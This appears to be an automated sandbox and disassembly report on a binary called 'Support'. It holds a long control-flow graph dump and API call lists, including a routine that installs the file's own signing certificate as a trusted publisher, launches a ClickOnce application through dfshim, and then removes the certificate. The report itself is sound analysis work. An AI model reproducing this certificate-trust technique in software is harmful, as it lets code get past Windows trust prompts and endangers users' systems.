5372 c044fd 5369->5372 5373 c04515 SetLastError 5370->5373 5371->5368 5374 c04296 _abort 12 API calls 5372->5374 5373->5366 5375 c04508 5374->5375 5376 c04869 _free 12 API calls 5375->5376 5377 c0450e 5376->5377 5377->5365 5377->5373 5390 c046c2 5378->5390 5380 c04749 5380->5326 5381->5327 5382->5330 5384 c04424 _abort 33 API calls 5383->5384 5385 c06b6b 5384->5385 5385->5337 5387 c06d35 5386->5387 5388 c06cfe 5386->5388 5402 c0572a LeaveCriticalSection 5387->5402 5388->5326 5388->5335 5388->5339 5391 c044a8 __dosmaperr 15 API calls 5390->5391 5392 c046d8 5391->5392 5393 c046e6 _ValidateLocalCookies 5392->5393 5398 c0474d IsProcessorFeaturePresent 5392->5398 5393->5380 5395 c0473c 5396 c046c2 _abort 21 API calls 5395->5396 5397 c04749 5396->5397 5397->5380 5399 c04758 5398->5399 5400 c04573 _abort 3 API calls 5399->5400 5401 c0476d GetCurrentProcess TerminateProcess 5400->5401 5401->5395 5402->5388 5403->5106 5407 c0572a LeaveCriticalSection 5404->5407 5406 c052e1 5406->5106 5407->5406 5409 c03f8f 5408->5409 5410 c03f85 5408->5410 5409->5410 5411 c04424 _abort 33 API calls 5409->5411 5410->5114 5410->5115 5412 c03fb0 5411->5412 5416 c072d1 5412->5416 5417 c072e4 5416->5417 5418 c03fc9 5416->5418 5417->5418 5424 c06754 5417->5424 5420 c072fe 5418->5420 5421 c07311 5420->5421 5422 c07326 5420->5422 5421->5422 5423 c05249 __fassign 33 API calls 5421->5423 5422->5410 5423->5422 5425 c06760 ___scrt_is_nonwritable_in_current_image 5424->5425 5426 c04424 _abort 33 API calls 5425->5426 5427 c06769 5426->5427 5428 c067b7 _abort 5427->5428 5436 c056e2 EnterCriticalSection 5427->5436 5428->5418 5430 c06787 5437 c067cb 5430->5437 5435 c03f24 _abort 33 API calls 5435->5428 5436->5430 5438 c0679b 5437->5438 5439 c067d9 __fassign 5437->5439 5441 c067ba 5438->5441 5439->5438 5440 c06507 __fassign 15 API calls 5439->5440 5440->5438 5444 c0572a LeaveCriticalSection 5441->5444 5443 c067ae 5443->5428 5443->5435 5444->5443 5448 c0507a _ValidateLocalCookies 5445->5448 5449 c04fd0 
5445->5449 5447 c05031 5465 c07cd1 5447->5465 5448->5130 5453 c0634d 5449->5453 5452 c07cd1 38 API calls 5452->5448 5454 c03f72 __fassign 33 API calls 5453->5454 5455 c0636d MultiByteToWideChar 5454->5455 5457 c063ab 5455->5457 5458 c06443 _ValidateLocalCookies 5455->5458 5459 c062ff 16 API calls 5457->5459 5463 c063cc _abort __alloca_probe_16 5457->5463 5458->5447 5459->5463 5460 c0643d 5470 c0646a 5460->5470 5462 c06411 MultiByteToWideChar 5462->5460 5464 c0642d GetStringTypeW 5462->5464 5463->5460 5463->5462 5464->5460 5466 c03f72 __fassign 33 API calls 5465->5466 5467 c07ce4 5466->5467 5474 c07ab4 5467->5474 5469 c05052 5469->5452 5471 c06476 5470->5471 5473 c06487 5470->5473 5472 c04869 _free 15 API calls 5471->5472 5471->5473 5472->5473 5473->5458 5475 c07acf 5474->5475 5476 c07af5 MultiByteToWideChar 5475->5476 5477 c07ca9 _ValidateLocalCookies 5476->5477 5478 c07b1f 5476->5478 5477->5469 5480 c062ff 16 API calls 5478->5480 5482 c07b40 __alloca_probe_16 5478->5482 5479 c07b89 MultiByteToWideChar 5481 c07ba2 5479->5481 5494 c07bf5 5479->5494 5480->5482 5499 c05a15 5481->5499 5482->5479 5482->5494 5484 c0646a __freea 15 API calls 5484->5477 5485 c07bb9 5486 c07c04 5485->5486 5487 c07bcc 5485->5487 5485->5494 5488 c07c25 __alloca_probe_16 5486->5488 5489 c062ff 16 API calls 5486->5489 5490 c05a15 6 API calls 5487->5490 5487->5494 5491 c07c9a 5488->5491 5493 c05a15 6 API calls 5488->5493 5489->5488 5490->5494 5492 c0646a __freea 15 API calls 5491->5492 5492->5494 5495 c07c79 5493->5495 5494->5484 5495->5491 5496 c07c88 WideCharToMultiByte 5495->5496 5496->5491 5497 c07cc8 5496->5497 5498 c0646a __freea 15 API calls 5497->5498 5498->5494 5500 c05741 _abort 5 API calls 5499->5500 5501 c05a3c 5500->5501 5504 c05a45 _ValidateLocalCookies 5501->5504 5505 c05a9d 5501->5505 5503 c05a85 LCMapStringW 5503->5504 5504->5485 5506 c05741 _abort 5 API calls 5505->5506 5507 c05ac4 _ValidateLocalCookies 5506->5507 5507->5503 5509 c04d5d ___scrt_is_nonwritable_in_current_image 
5508->5509 5516 c056e2 EnterCriticalSection 5509->5516 5511 c04d67 5517 c04dbc 5511->5517 5515 c04d80 _abort 5515->5144 5516->5511 5529 c054dc 5517->5529 5519 c04e0a 5520 c054dc 21 API calls 5519->5520 5521 c04e26 5520->5521 5522 c054dc 21 API calls 5521->5522 5523 c04e44 5522->5523 5524 c04d74 5523->5524 5525 c04869 _free 15 API calls 5523->5525 5526 c04d88 5524->5526 5525->5524 5543 c0572a LeaveCriticalSection 5526->5543 5528 c04d92 5528->5515 5530 c054ed 5529->5530 5534 c054e9 5529->5534 5531 c054f4 5530->5531 5536 c05507 _abort 5530->5536 5532 c047f9 __dosmaperr 15 API calls 5531->5532 5533 c054f9 5532->5533 5535 c0473d _abort 21 API calls 5533->5535 5534->5519 5535->5534 5536->5534 5537 c05535 5536->5537 5538 c0553e 5536->5538 5539 c047f9 __dosmaperr 15 API calls 5537->5539 5538->5534 5540 c047f9 __dosmaperr 15 API calls 5538->5540 5541 c0553a 5539->5541 5540->5541 5542 c0473d _abort 21 API calls 5541->5542 5542->5534 5543->5528 5545 c03f72 __fassign 33 API calls 5544->5545 5546 c05571 5545->5546 5546->4936 5548 c0356a _abort 5547->5548 5549 c03582 5548->5549 5562 c036b8 GetModuleHandleW 5548->5562 5569 c056e2 EnterCriticalSection 5549->5569 5556 c0358a 5558 c035ff _abort 5556->5558 5570 c03c97 5556->5570 5557 c03671 _abort 5557->4968 5573 c03668 5558->5573 5563 c03576 5562->5563 5563->5549 5564 c036fc GetModuleHandleExW 5563->5564 5565 c03726 GetProcAddress 5564->5565 5566 c0373b 5564->5566 5565->5566 5567 c03758 _ValidateLocalCookies 5566->5567 5568 c0374f FreeLibrary 5566->5568 5567->5549 5568->5567 5569->5556 5584 c039d0 5570->5584 5604 c0572a LeaveCriticalSection 5573->5604 5575 c03641 5575->5557 5576 c03677 5575->5576 5605 c05b1f 5576->5605 5578 c03681 5579 c036a5 5578->5579 5580 c03685 GetPEB 5578->5580 5581 c036fc _abort 3 API calls 5579->5581 5580->5579 5582 c03695 GetCurrentProcess TerminateProcess 5580->5582 5583 c036ad ExitProcess 5581->5583 5582->5579 5587 c0397f 5584->5587 5586 c039f4 5586->5558 5588 c0398b ___scrt_is_nonwritable_in_current_image 
5587->5588 5595 c056e2 EnterCriticalSection 5588->5595 5590 c03999 5596 c03a20 5590->5596 5592 c039a6 5600 c039c4 5592->5600 5594 c039b7 _abort 5594->5586 5595->5590 5597 c03a40 _ValidateLocalCookies 5596->5597 5598 c03a48 5596->5598 5597->5592 5598->5597 5599 c04869 _free 15 API calls 5598->5599 5599->5597 5603 c0572a LeaveCriticalSection 5600->5603 5602 c039ce 5602->5594 5603->5602 5604->5575 5606 c05b44 5605->5606 5608 c05b3a _ValidateLocalCookies 5605->5608 5607 c05741 _abort 5 API calls 5606->5607 5607->5608 5608->5578 6082 c0324d 6083 c0522b 46 API calls 6082->6083 6084 c0325f 6083->6084 6093 c0561e GetEnvironmentStringsW 6084->6093 6087 c0326a 6089 c04869 _free 15 API calls 6087->6089 6090 c0329f 6089->6090 6091 c03275 6092 c04869 _free 15 API calls 6091->6092 6092->6087 6094 c05635 6093->6094 6104 c05688 6093->6104 6097 c0563b WideCharToMultiByte 6094->6097 6095 c05691 FreeEnvironmentStringsW 6096 c03264 6095->6096 6096->6087 6105 c032a5 6096->6105 6098 c05657 6097->6098 6097->6104 6099 c062ff 16 API calls 6098->6099 6100 c0565d 6099->6100 6101 c0567a 6100->6101 6102 c05664 WideCharToMultiByte 6100->6102 6103 c04869 _free 15 API calls 6101->6103 6102->6101 6103->6104 6104->6095 6104->6096 6106 c032ba 6105->6106 6107 c0480c _abort 15 API calls 6106->6107 6108 c032e1 6107->6108 6110 c03345 6108->6110 6112 c0480c _abort 15 API calls 6108->6112 6113 c03347 6108->6113 6117 c03369 6108->6117 6120 c04869 _free 15 API calls 6108->6120 6122 c03eca 6108->6122 6109 c04869 _free 15 API calls 6111 c0335f 6109->6111 6110->6109 6111->6091 6112->6108 6115 c03376 15 API calls 6113->6115 6116 c0334d 6115->6116 6118 c04869 _free 15 API calls 6116->6118 6119 c0474d _abort 6 API calls 6117->6119 6118->6110 6121 c03375 6119->6121 6120->6108 6123 c03ed7 6122->6123 6124 c03ee5 6122->6124 6123->6124 6129 c03efc 6123->6129 6125 c047f9 __dosmaperr 15 API calls 6124->6125 6126 c03eed 6125->6126 6127 c0473d _abort 21 API calls 6126->6127 6128 c03ef7 6127->6128 6128->6108 6129->6128 
6130 c047f9 __dosmaperr 15 API calls 6129->6130 6130->6126 5650 c055ce GetCommandLineA GetCommandLineW 5841 c03d8f 5842 c03d9e 5841->5842 5846 c03db2 5841->5846 5844 c04869 _free 15 API calls 5842->5844 5842->5846 5843 c04869 _free 15 API calls 5845 c03dc4 5843->5845 5844->5846 5847 c04869 _free 15 API calls 5845->5847 5846->5843 5848 c03dd7 5847->5848 5849 c04869 _free 15 API calls 5848->5849 5850 c03de8 5849->5850 5851 c04869 _free 15 API calls 5850->5851 5852 c03df9 5851->5852 6206 c0430f 6207 c0431a 6206->6207 6208 c0432a 6206->6208 6212 c04330 6207->6212 6211 c04869 _free 15 API calls 6211->6208 6213 c04343 6212->6213 6214 c04349 6212->6214 6215 c04869 _free 15 API calls 6213->6215 6216 c04869 _free 15 API calls 6214->6216 6215->6214 6217 c04355 6216->6217 6218 c04869 _free 15 API calls 6217->6218 6219 c04360 6218->6219 6220 c04869 _free 15 API calls 6219->6220 6221 c0436b 6220->6221 6222 c04869 _free 15 API calls 6221->6222 6223 c04376 6222->6223 6224 c04869 _free 15 API calls 6223->6224 6225 c04381 6224->6225 6226 c04869 _free 15 API calls 6225->6226 6227 c0438c 6226->6227 6228 c04869 _free 15 API calls 6227->6228 6229 c04397 6228->6229 6230 c04869 _free 15 API calls 6229->6230 6231 c043a2 6230->6231 6232 c04869 _free 15 API calls 6231->6232 6233 c043b0 6232->6233 6238 c041f6 6233->6238 6244 c04102 6238->6244 6240 c0421a 6241 c04246 6240->6241 6257 c04163 6241->6257 6243 c0426a 6243->6211 6245 c0410e ___scrt_is_nonwritable_in_current_image 6244->6245 6252 c056e2 EnterCriticalSection 6245->6252 6247 c04142 6253 c04157 6247->6253 6249 c04118 6249->6247 6251 c04869 _free 15 API calls 6249->6251 6250 c0414f _abort 6250->6240 6251->6247 6252->6249 6256 c0572a LeaveCriticalSection 6253->6256 6255 c04161 6255->6250 6256->6255 6258 c0416f ___scrt_is_nonwritable_in_current_image 6257->6258 6265 c056e2 EnterCriticalSection 6258->6265 6260 c04179 6261 c043d9 _abort 15 API calls 6260->6261 6262 c0418c 6261->6262 6266 c041a2 6262->6266 6264 c0419a _abort 6264->6243 
6265->6260 6269 c0572a LeaveCriticalSection 6266->6269 6268 c041ac 6268->6264 6269->6268 5651 c05fd0 5652 c05fdc ___scrt_is_nonwritable_in_current_image 5651->5652 5663 c056e2 EnterCriticalSection 5652->5663 5654 c05fe3 5664 c05c8b 5654->5664 5656 c05ff2 5662 c06001 5656->5662 5677 c05e64 GetStartupInfoW 5656->5677 5661 c06012 _abort 5688 c0601d 5662->5688 5663->5654 5665 c05c97 ___scrt_is_nonwritable_in_current_image 5664->5665 5666 c05ca4 5665->5666 5667 c05cbb 5665->5667 5669 c047f9 __dosmaperr 15 API calls 5666->5669 5691 c056e2 EnterCriticalSection 5667->5691 5670 c05ca9 5669->5670 5671 c0473d _abort 21 API calls 5670->5671 5672 c05cb3 _abort 5671->5672 5672->5656 5675 c05cf3 5699 c05d1a 5675->5699 5676 c05cc7 5676->5675 5692 c05bdc 5676->5692 5678 c05e81 5677->5678 5680 c05f13 5677->5680 5679 c05c8b 22 API calls 5678->5679 5678->5680 5681 c05eaa 5679->5681 5683 c05f1a 5680->5683 5681->5680 5682 c05ed8 GetFileType 5681->5682 5682->5681 5687 c05f21 5683->5687 5684 c05f64 GetStdHandle 5684->5687 5685 c05fcc 5685->5662 5686 c05f77 GetFileType 5686->5687 5687->5684 5687->5685 5687->5686 5708 c0572a LeaveCriticalSection 5688->5708 5690 c06024 5690->5661 5691->5676 5693 c0480c _abort 15 API calls 5692->5693 5695 c05bee 5693->5695 5694 c05bfb 5696 c04869 _free 15 API calls 5694->5696 5695->5694 5702 c059b3 5695->5702 5697 c05c4d 5696->5697 5697->5676 5707 c0572a LeaveCriticalSection 5699->5707 5701 c05d21 5701->5672 5703 c05741 _abort 5 API calls 5702->5703 5704 c059da 5703->5704 5705 c059e3 _ValidateLocalCookies 5704->5705 5706 c059f8 InitializeCriticalSectionAndSpinCount 5704->5706 5705->5695 5706->5705 5707->5701 5708->5690 6270 c07a10 6273 c07a27 6270->6273 6274 c07a35 6273->6274 6275 c07a49 6273->6275 6276 c047f9 __dosmaperr 15 API calls 6274->6276 6277 c07a51 6275->6277 6278 c07a63 6275->6278 6279 c07a3a 6276->6279 6280 c047f9 __dosmaperr 15 API calls 6277->6280 6281 c03f72 __fassign 33 API calls 6278->6281 6284 c07a22 6278->6284 6282 c0473d _abort 21 API calls 
6279->6282 6283 c07a56 6280->6283 6281->6284 6282->6284 6285 c0473d _abort 21 API calls 6283->6285 6285->6284 6131 c07351 6132 c0735e 6131->6132 6133 c0480c _abort 15 API calls 6132->6133 6134 c07378 6133->6134 6135 c04869 _free 15 API calls 6134->6135 6136 c07384 6135->6136 6137 c0480c _abort 15 API calls 6136->6137 6141 c073aa 6136->6141 6138 c0739e 6137->6138 6140 c04869 _free 15 API calls 6138->6140 6139 c059b3 6 API calls 6139->6141 6140->6141 6141->6139 6142 c073b6 6141->6142 6143 c07414 6141->6143 5853 c06893 GetProcessHeap 6144 c02f53 6145 c02f62 6144->6145 6146 c02f7e 6144->6146 6145->6146 6147 c02f68 6145->6147 6148 c0522b 46 API calls 6146->6148 6149 c047f9 __dosmaperr 15 API calls 6147->6149 6150 c02f85 GetModuleFileNameA 6148->6150 6151 c02f6d 6149->6151 6152 c02fa9 6150->6152 6153 c0473d _abort 21 API calls 6151->6153 6167 c03077 6152->6167 6155 c02f77 6153->6155 6159 c02fe8 6162 c03077 33 API calls 6159->6162 6160 c02fdc 6161 c047f9 __dosmaperr 15 API calls 6160->6161 6166 c02fe1 6161->6166 6164 c02ffe 6162->6164 6163 c04869 _free 15 API calls 6163->6155 6165 c04869 _free 15 API calls 6164->6165 6164->6166 6165->6166 6166->6163 6169 c0309c 6167->6169 6168 c055b6 33 API calls 6168->6169 6169->6168 6171 c030fc 6169->6171 6170 c02fc6 6173 c031ec 6170->6173 6171->6170 6172 c055b6 33 API calls 6171->6172 6172->6171 6174 c03201 6173->6174 6175 c02fd3 6173->6175 6174->6175 6176 c0480c _abort 15 API calls 6174->6176 6175->6159 6175->6160 6177 c0322f 6176->6177 6178 c04869 _free 15 API calls 6177->6178 6178->6175 6286 c07419 6296 c07fb2 6286->6296 6290 c07426 6309 c0828e 6290->6309 6293 c07450 6294 c04869 _free 15 API calls 6293->6294 6295 c0745b 6294->6295 6313 c07fbb 6296->6313 6298 c07421 6299 c081ee 6298->6299 6300 c081fa ___scrt_is_nonwritable_in_current_image 6299->6300 6333 c056e2 EnterCriticalSection 6300->6333 6302 c08270 6347 c08285 6302->6347 6304 c08244 DeleteCriticalSection 6307 c04869 _free 15 API calls 6304->6307 6305 c08205 6305->6302 
6305->6304 6334 c0901c 6305->6334 6307->6305 6308 c0827c _abort 6308->6290 6310 c082a4 6309->6310 6311 c07435 DeleteCriticalSection 6309->6311 6310->6311 6312 c04869 _free 15 API calls 6310->6312 6311->6290 6311->6293 6312->6311 6314 c07fc7 ___scrt_is_nonwritable_in_current_image 6313->6314 6323 c056e2 EnterCriticalSection 6314->6323 6316 c0806a 6328 c0808a 6316->6328 6319 c08076 _abort 6319->6298 6321 c07fd6 6321->6316 6322 c07f6b 61 API calls 6321->6322 6324 c07465 EnterCriticalSection 6321->6324 6325 c08060 6321->6325 6322->6321 6323->6321 6324->6321 6331 c07479 LeaveCriticalSection 6325->6331 6327 c08068 6327->6321 6332 c0572a LeaveCriticalSection 6328->6332 6330 c08091 6330->6319 6331->6327 6332->6330 6333->6305 6335 c09028 ___scrt_is_nonwritable_in_current_image 6334->6335 6336 c09039 6335->6336 6337 c0904e 6335->6337 6338 c047f9 __dosmaperr 15 API calls 6336->6338 6346 c09049 _abort 6337->6346 6350 c07465 EnterCriticalSection 6337->6350 6340 c0903e 6338->6340 6342 c0473d _abort 21 API calls 6340->6342 6341 c0906a 6351 c08fa6 6341->6351 6342->6346 6344 c09075 6367 c09092 6344->6367 6346->6305 6605 c0572a LeaveCriticalSection 6347->6605 6349 c0828c 6349->6308 6350->6341 6352 c08fb3 6351->6352 6353 c08fc8 6351->6353 6354 c047f9 __dosmaperr 15 API calls 6352->6354 6358 c08fc3 6353->6358 6370 c07f05 6353->6370 6355 c08fb8 6354->6355 6357 c0473d _abort 21 API calls 6355->6357 6357->6358 6358->6344 6360 c0828e 15 API calls 6361 c08fe4 6360->6361 6376 c0732b 6361->6376 6363 c08fea 6383 c09d4e 6363->6383 6366 c04869 _free 15 API calls 6366->6358 6604 c07479 LeaveCriticalSection 6367->6604 6369 c0909a 6369->6346 6371 c07f1d 6370->6371 6372 c07f19 6370->6372 6371->6372 6373 c0732b 21 API calls 6371->6373 6372->6360 6374 c07f3d 6373->6374 6398 c089a7 6374->6398 6377 c07337 6376->6377 6378 c0734c 6376->6378 6379 c047f9 __dosmaperr 15 API calls 6377->6379 6378->6363 6380 c0733c 6379->6380 6381 c0473d _abort 21 API calls 6380->6381 6382 c07347 6381->6382 6382->6363 6384 
c09d72 6383->6384 6385 c09d5d 6383->6385 6386 c09dad 6384->6386 6390 c09d99 6384->6390 6387 c047e6 __dosmaperr 15 API calls 6385->6387 6388 c047e6 __dosmaperr 15 API calls 6386->6388 6389 c09d62 6387->6389 6391 c09db2 6388->6391 6392 c047f9 __dosmaperr 15 API calls 6389->6392 6561 c09d26 6390->6561 6394 c047f9 __dosmaperr 15 API calls 6391->6394 6395 c08ff0 6392->6395 6396 c09dba 6394->6396 6395->6358 6395->6366 6397 c0473d _abort 21 API calls 6396->6397 6397->6395 6399 c089b3 ___scrt_is_nonwritable_in_current_image 6398->6399 6400 c089d3 6399->6400 6401 c089bb 6399->6401 6403 c08a71 6400->6403 6408 c08a08 6400->6408 6423 c047e6 6401->6423 6405 c047e6 __dosmaperr 15 API calls 6403->6405 6407 c08a76 6405->6407 6406 c047f9 __dosmaperr 15 API calls 6413 c089c8 _abort 6406->6413 6409 c047f9 __dosmaperr 15 API calls 6407->6409 6426 c05d23 EnterCriticalSection 6408->6426 6411 c08a7e 6409->6411 6414 c0473d _abort 21 API calls 6411->6414 6412 c08a0e 6415 c08a2a 6412->6415 6416 c08a3f 6412->6416 6413->6372 6414->6413 6418 c047f9 __dosmaperr 15 API calls 6415->6418 6427 c08a92 6416->6427 6419 c08a2f 6418->6419 6421 c047e6 __dosmaperr 15 API calls 6419->6421 6420 c08a3a 6476 c08a69 6420->6476 6421->6420 6424 c044a8 __dosmaperr 15 API calls 6423->6424 6425 c047eb 6424->6425 6425->6406 6426->6412 6428 c08ac0 6427->6428 6434 c08ab9 _ValidateLocalCookies 6427->6434 6429 c08ae3 6428->6429 6430 c08ac4 6428->6430 6432 c08b34 6429->6432 6433 c08b17 6429->6433 6431 c047e6 __dosmaperr 15 API calls 6430->6431 6435 c08ac9 6431->6435 6437 c08b4a 6432->6437 6479 c08f8b 6432->6479 6436 c047e6 __dosmaperr 15 API calls 6433->6436 6434->6420 6438 c047f9 __dosmaperr 15 API calls 6435->6438 6439 c08b1c 6436->6439 6482 c08637 6437->6482 6441 c08ad0 6438->6441 6444 c047f9 __dosmaperr 15 API calls 6439->6444 6445 c0473d _abort 21 API calls 6441->6445 6448 c08b24 6444->6448 6445->6434 6446 c08b91 6452 c08ba5 6446->6452 6453 c08beb WriteFile 6446->6453 6447 c08b58 6449 c08b5c 6447->6449 6450 c08b7e 
6447->6450 6451 c0473d _abort 21 API calls 6448->6451 6454 c08c52 6449->6454 6489 c085ca 6449->6489 6494 c08417 GetConsoleCP 6450->6494 6451->6434 6457 c08bdb 6452->6457 6458 c08bad 6452->6458 6456 c08c0e GetLastError 6453->6456 6461 c08b74 6453->6461 6454->6434 6465 c047f9 __dosmaperr 15 API calls 6454->6465 6456->6461 6514 c086ad 6457->6514 6462 c08bb2 6458->6462 6463 c08bcb 6458->6463 6461->6434 6461->6454 6467 c08c2e 6461->6467 6462->6454 6503 c0878c 6462->6503 6508 c0887a 6463->6508 6466 c08c77 6465->6466 6469 c047e6 __dosmaperr 15 API calls 6466->6469 6470 c08c35 6467->6470 6471 c08c49 6467->6471 6469->6434 6473 c047f9 __dosmaperr 15 API calls 6470->6473 6519 c047c3 6471->6519 6474 c08c3a 6473->6474 6475 c047e6 __dosmaperr 15 API calls 6474->6475 6475->6434 6560 c05d46 LeaveCriticalSection 6476->6560 6478 c08a6f 6478->6413 6524 c08f0d 6479->6524 6546 c07eaf 6482->6546 6484 c0864c 6484->6446 6484->6447 6485 c08647 6485->6484 6486 c04424 _abort 33 API calls 6485->6486 6487 c0866f 6486->6487 6487->6484 6488 c0868d GetConsoleMode 6487->6488 6488->6484 6490 c08624 6489->6490 6493 c085ef 6489->6493 6490->6461 6491 c09101 WriteConsoleW CreateFileW 6491->6493 6492 c08626 GetLastError 6492->6490 6493->6490 6493->6491 6493->6492 6496 c0858c _ValidateLocalCookies 6494->6496 6498 c0847a 6494->6498 6496->6461 6497 c072b7 35 API calls __fassign 6497->6498 6498->6496 6498->6497 6499 c08500 WideCharToMultiByte 6498->6499 6502 c08557 WriteFile 6498->6502 6555 c06052 6498->6555 6499->6496 6500 c08526 WriteFile 6499->6500 6500->6498 6501 c085af GetLastError 6500->6501 6501->6496 6502->6498 6502->6501 6504 c0879b 6503->6504 6505 c08819 WriteFile 6504->6505 6506 c0885d _ValidateLocalCookies 6504->6506 6505->6504 6507 c0885f GetLastError 6505->6507 6506->6461 6507->6506 6513 c08889 6508->6513 6509 c08994 _ValidateLocalCookies 6509->6461 6510 c0890b WideCharToMultiByte 6511 c08940 WriteFile 6510->6511 6512 c0898c GetLastError 6510->6512 6511->6512 6511->6513 6512->6509 6513->6509 
6513->6510 6513->6511 6517 c086bc 6514->6517 6515 c0872e WriteFile 6515->6517 6518 c08771 GetLastError 6515->6518 6516 c0876f _ValidateLocalCookies 6516->6461 6517->6515 6517->6516 6518->6516 6520 c047e6 __dosmaperr 15 API calls 6519->6520 6521 c047ce __dosmaperr 6520->6521 6522 c047f9 __dosmaperr 15 API calls 6521->6522 6523 c047e1 6522->6523 6523->6434 6533 c05dfa 6524->6533 6526 c08f1f 6527 c08f27 6526->6527 6528 c08f38 SetFilePointerEx 6526->6528 6529 c047f9 __dosmaperr 15 API calls 6527->6529 6530 c08f50 GetLastError 6528->6530 6531 c08f2c 6528->6531 6529->6531 6532 c047c3 __dosmaperr 15 API calls 6530->6532 6531->6437 6532->6531 6534 c05e07 6533->6534 6536 c05e1c 6533->6536 6535 c047e6 __dosmaperr 15 API calls 6534->6535 6538 c05e0c 6535->6538 6537 c047e6 __dosmaperr 15 API calls 6536->6537 6540 c05e41 6536->6540 6541 c05e4c 6537->6541 6539 c047f9 __dosmaperr 15 API calls 6538->6539 6542 c05e14 6539->6542 6540->6526 6543 c047f9 __dosmaperr 15 API calls 6541->6543 6542->6526 6544 c05e54 6543->6544 6545 c0473d _abort 21 API calls 6544->6545 6545->6542 6547 c07ec9 6546->6547 6548 c07ebc 6546->6548 6550 c047f9 __dosmaperr 15 API calls 6547->6550 6552 c07ed5 6547->6552 6549 c047f9 __dosmaperr 15 API calls 6548->6549 6551 c07ec1 6549->6551 6553 c07ef6 6550->6553 6551->6485 6552->6485 6554 c0473d _abort 21 API calls 6553->6554 6554->6551 6556 c04424 _abort 33 API calls 6555->6556 6557 c0605d 6556->6557 6558 c072d1 __fassign 33 API calls 6557->6558 6559 c0606d 6558->6559 6559->6498 6560->6478 6564 c09ca4 6561->6564 6563 c09d4a 6563->6395 6565 c09cb0 ___scrt_is_nonwritable_in_current_image 6564->6565 6575 c05d23 EnterCriticalSection 6565->6575 6567 c09cbe 6568 c09cf0 6567->6568 6569 c09ce5 6567->6569 6570 c047f9 __dosmaperr 15 API calls 6568->6570 6576 c09dcd 6569->6576 6572 c09ceb 6570->6572 6591 c09d1a 6572->6591 6574 c09d0d _abort 6574->6563 6575->6567 6577 c05dfa 21 API calls 6576->6577 6579 c09ddd 6577->6579 6578 c09de3 6594 c05d69 6578->6594 6579->6578 6581 

Control-flow Graph

APIs
• LocalAlloc.KERNEL32(00000000,00000104), ref: 00C01016
• GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00C01025
• CertOpenSystemStoreA.CRYPT32(00000000,TrustedPublisher), ref: 00C01032
• LocalAlloc.KERNELBASE(00000000,00040000), ref: 00C01057
• LocalAlloc.KERNEL32(00000000,00040000), ref: 00C01063
• CryptQueryObject.CRYPT32(00000001,00000000,00000400,00000002,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00C01082
• CryptMsgGetParam.CRYPT32(?,0000000B,00000000,?,?), ref: 00C010B2
• LocalAlloc.KERNEL32(00000000,?), ref: 00C010C5
• LocalAlloc.KERNEL32(00000000,00002000), ref: 00C010F4
• CryptMsgGetParam.CRYPT32(?,0000000C,00000000,00000000,00002000), ref: 00C0110A
• CertCreateCertificateContext.CRYPT32(00000001,00000000,00002000), ref: 00C0111A
• CertAddCertificateContextToStore.CRYPT32(?,00000000,00000001,00000000), ref: 00C0112D
• CertFreeCertificateContext.CRYPT32(00000000), ref: 00C01134
• LocalFree.KERNEL32(00000000), ref: 00C0113E
• LocalFree.KERNEL32(00000000), ref: 00C0115D
• CryptMsgGetParam.CRYPT32(?,00000009,00000000,00000000,00040000), ref: 00C0116E
• CryptMsgGetParam.CRYPT32(?,0000000A,00000000,?,00040000), ref: 00C01182
• CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,00000000,?), ref: 00C01198
• CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,?,?), ref: 00C011A9
• LoadLibraryA.KERNELBASE(dfshim), ref: 00C011BA
• GetProcAddress.KERNEL32(00000000,ShOpenVerbApplicationW), ref: 00C011C6
• Sleep.KERNELBASE(00009C40), ref: 00C011E8
• CertDeleteCertificateFromStore.CRYPT32(?), ref: 00C0120B
• CertCloseStore.CRYPT32(?,00000000), ref: 00C0121A
• LocalFree.KERNEL32(?), ref: 00C01223
• LocalFree.KERNEL32(?), ref: 00C01228
• LocalFree.KERNEL32(?), ref: 00C0122D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.2002913617.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2002938677.0000000000C0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2002951164.0000000000C11000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2002962574.0000000000C13000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_Support.jbxd
Similarity
• API ID: Local$Cert$Free$AllocCrypt$CertificateParamStore$Context$AttributeFind$AddressCloseCreateDeleteFileFromLibraryLoadModuleNameObjectOpenProcQuerySleepSystem
• String ID: 1.3.6.1.4.1.311.4.1.1$ShOpenVerbApplicationW$TrustedPublisher$dfshim
• API String ID: 335784236-860318880
• Opcode ID: eecf06939482279edbedd7dba114f757847bf2869c06640bce5e3c4ee20f182f
• Instruction ID: 6d6890a044a6d35543bcb81590420163a50e498f924e15b4905fbf7abc0bc12d
• Opcode Fuzzy Hash: eecf06939482279edbedd7dba114f757847bf2869c06640bce5e3c4ee20f182f
• Instruction Fuzzy Hash: 05614CB1A40218ABEB21DF90DC45FAEBBB9FF48B54F154014FA24B7290C7719E01CBA4
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00C0192B
• IsDebuggerPresent.KERNEL32 ref: 00C019F7
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C01A10
• UnhandledExceptionFilter.KERNEL32(?), ref: 00C01A1A
Memory Dump Source
• Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.2002913617.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2002938677.0000000000C0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2002951164.0000000000C11000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2002962574.0000000000C13000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_Support.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
• String ID:
• API String ID: 254469556-0
• Opcode ID: 3fc4dea7ee55c86967a05f5a8e67ee649e2994152e6af795facd9d92aedacf08
